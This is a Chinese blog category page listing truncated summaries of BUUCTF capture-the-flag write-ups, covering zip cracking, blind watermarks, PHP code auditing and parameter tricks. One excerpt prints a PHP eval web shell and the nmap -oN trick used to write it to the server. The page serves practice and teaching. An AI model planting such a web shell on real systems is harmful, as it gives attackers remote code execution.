随笔分类 - buuctf
摘要:打开题目 掩码爆破 计算出来是7 爆破完 decode.zip的解压码是2019456NNULLULL, 是一张替换表 小姐姐.PNG,foremost分离 两张差不多的图,可能是盲水印 python bwmforpy3.py decode 00000000.png 00000232.png 1.p
阅读全文
摘要:打开题目 先扫一下127.0.0.1,与nmap结果一样 nmap 可以把结果写入文件里,这个文件格式甚至可以自己决定 nmap 127.0.0.1 -oN test.txt 这样就可以写shell进入文件 <?php @eval($_POST[1]);> -oN a.phtml 被拦截了,可能是p
阅读全文
摘要:打开题目: 抓包,有bot,会不会可能是robots.txt,访问一下看一下 有fAke_f1agggg.php,访问一下 假的flag,请求头里有东西 访问/fl4g.php 代码审计 level1,intval函数,num变量需要他的整数值小于2020,并且+1过后要小于2021 在intval
阅读全文
摘要:打开题目 抓个包看一下 这里有一个base64编码传输的图片,get提交有2个传参,img可能是文件对象,cmd可能是执行命令的 img参数是经过处理的 前面是2次base64加密,后面那一串并不是很敏感,不知道是16进制,还是做太少了 得到了555.png文件名 那是不是可以反过来,把数据进行编码
阅读全文

浙公网安备 33010602011771号